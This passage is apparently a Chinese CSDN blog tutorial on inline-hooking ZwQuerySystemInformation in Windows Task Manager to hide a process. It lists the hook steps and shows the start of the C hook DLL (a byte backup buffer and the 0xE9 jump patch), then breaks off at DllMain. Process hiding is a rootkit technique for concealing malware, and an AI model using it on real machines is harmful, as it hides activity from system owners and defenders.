InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程

最新推荐文章于 2024-08-20 10:46:37 发布

yeanhoo

最新推荐文章于 2024-08-20 10:46:37 发布

阅读量630

点赞数 1

分类专栏： C/C++编程文章标签： inlineHOOK

本文链接：https://blog.csdn.net/weixin_41890599/article/details/108771429

版权

本文介绍了如何使用InlineHook技术在任务管理器的ZwQuerySystemInformation函数中隐藏进程。详细步骤包括查找目标函数地址，设置跳转到自定义函数，卸载钩子并过滤信息后恢复原函数执行。提供了hook代码示例，并展示了注入hookdll到任务管理器后的效果。

摘要由CSDN通过智能技术生成

InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程

hook步骤：

查找目标函数地址
修改目标函数第一条指令跳转到我们构造的函数
卸载掉钩子，执行正常的目标函数
过滤掉特定信息后返回

hook代码如下

#include<windows.h>
#include<Winternl.h>

BOOL hook_code();
BOOL unHook_code();
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
char StroneDate[5]={0x00,0x00,0x00,0x00,0x00,};//备份原始字节
DWORD OldProtect;//原始页保护属性
DWORD dwAddress;//跳转偏移地址
FARPROC procaddr;
DWORD num;
byte pBuf[5]={0xE9,0xFF,0xFF,0xFF,0xFF};
typedef NTSTATUS (WINAPI * ZwQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);

BOOL WINAPI DllMain(HMODULE hM